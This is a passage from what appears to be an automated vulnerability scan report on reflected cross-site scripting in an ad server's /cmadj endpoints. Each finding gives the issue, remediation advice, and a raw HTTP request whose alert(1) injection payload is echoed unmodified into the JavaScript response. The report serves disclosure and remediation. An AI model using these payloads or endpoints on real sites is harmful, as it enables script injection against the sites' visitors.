Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:22 GMT
Content-Length: 7340
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-28158542_1296080002","http://ad.doubleclick.net//iblocal.journalreg.midtownpress/atfaudience43cf1'-alert(1)-'7340f06b2aa;net=iblocal;u=,iblocal-28158542_1296080002,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=c

1.28. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cffc'-alert(1)-'c2790bfcb7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/atfaudience?7cffc'-alert(1)-'c2790bfcb7c=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:20 GMT
Content-Length: 7343
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-84015823_1296080000","http://ad.doubleclick.net//iblocal.journalreg.midtownpress/atfaudience?7cffc'-alert(1)-'c2790bfcb7c=1;net=iblocal;u=,iblocal-84015823_1296080000,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg

1.29. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac8d'-alert(1)-'b957835aa44 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/atfaudience;sz=aac8d'-alert(1)-'b957835aa44 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:18 GMT
Content-Length: 7373
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.30. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4430'-alert(1)-'58eafdc3809 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadje4430'-alert(1)-'58eafdc3809/iblocal.journalreg.midtownpress/btfaudience;sz=300x250;net=iblocal;ord=312010938; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:26 GMT
Content-Length: 7393
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-52638336_1296080006","http://ad.doubleclick.net/adje4430'-alert(1)-'58eafdc3809/iblocal.journalreg.midtownpress/btfaudience;net=iblocal;u=,iblocal-52638336_1296080006,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_

1.31. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac23f'-alert(1)-'02bd98d0091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpressac23f'-alert(1)-'02bd98d0091/btfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:26 GMT
Content-Length: 7340
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-22608337_1296080006","http://ad.doubleclick.net//iblocal.journalreg.midtownpressac23f'-alert(1)-'02bd98d0091/btfaudience;net=iblocal;u=,iblocal-22608337_1296080006,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg

1.32. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81444'-alert(1)-'901b713f2c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/btfaudience81444'-alert(1)-'901b713f2c9 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:26 GMT
Content-Length: 7340
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-15268035_1296080006","http://ad.doubleclick.net//iblocal.journalreg.midtownpress/btfaudience81444'-alert(1)-'901b713f2c9;net=iblocal;u=,iblocal-15268035_1296080006,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=c

1.33. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d14a3'-alert(1)-'4e4b23b1ce4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/btfaudience?d14a3'-alert(1)-'4e4b23b1ce4=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:24 GMT
Content-Length: 7343
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-88504711_1296080004","http://ad.doubleclick.net//iblocal.journalreg.midtownpress/btfaudience?d14a3'-alert(1)-'4e4b23b1ce4=1;net=iblocal;u=,iblocal-88504711_1296080004,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg

1.34. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22d65'-alert(1)-'a3ca6c783f4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/btfaudience;sz=22d65'-alert(1)-'a3ca6c783f4 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:21 GMT
Content-Length: 7371
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.35. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5296f'-alert(1)-'a02ae6fd824 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj5296f'-alert(1)-'a02ae6fd824/iblocal.revinet.nyron/audience;sz=728x90;net=iblocal;ord=0.9757017975207418; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:28 GMT
Content-Length: 7387
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-86000845_1296080008","http://ad.doubleclick.net/adj5296f'-alert(1)-'a02ae6fd824/iblocal.revinet.nyron/audience;net=iblocal;u=,iblocal-86000845_1296080008,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nurl;s

1.36. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fbdc'-alert(1)-'1f46aec2b44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.revinet.nyron1fbdc'-alert(1)-'1f46aec2b44/audience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:26 GMT
Content-Length: 7327
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-70867432_1296080006","http://ad.doubleclick.net//iblocal.revinet.nyron1fbdc'-alert(1)-'1f46aec2b44/audience;net=iblocal;u=,iblocal-70867432_1296080006,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex

1.37. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de645'-alert(1)-'27c0e3dd2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.revinet.nyron/audiencede645'-alert(1)-'27c0e3dd2a1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:27 GMT
Content-Length: 7321
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-43311_1296080007","http://ad.doubleclick.net//iblocal.revinet.nyron/audiencede645'-alert(1)-'27c0e3dd2a1;net=iblocal;u=,iblocal-43311_1296080007,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=cm.c

1.38. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a7e3'-alert(1)-'2ea202cdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.revinet.nyron/audience?2a7e3'-alert(1)-'2ea202cdc=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:25 GMT
Content-Length: 7328
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-19680426_1296080005","http://ad.doubleclick.net//iblocal.revinet.nyron/audience?2a7e3'-alert(1)-'2ea202cdc=1;net=iblocal;u=,iblocal-19680426_1296080005,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg=ex.76;btg

1.39. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e39d'-alert(1)-'a0e4b702861 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.revinet.nyron/audience;sz=8e39d'-alert(1)-'a0e4b702861 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:21 GMT
Content-Length: 7360
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.40. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92a20'-alert(1)-'515f38228f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj92a20'-alert(1)-'515f38228f4/q1.sarasota/be_life;sz=728x90;net=q1;ord=1296073210.391376; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:28 GMT
Content-Length: 7406
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-58738202_1296080008","http://ad.doubleclick.net/adj92a20'-alert(1)-'515f38228f4/q1.sarasota/be_life;net=q1;u=,q1-58738202_1296080008,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nurl;s

1.41. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6090d'-alert(1)-'ded34823b00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.sarasota6090d'-alert(1)-'ded34823b00/be_life HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:28 GMT
Content-Length: 7352
Connection: close

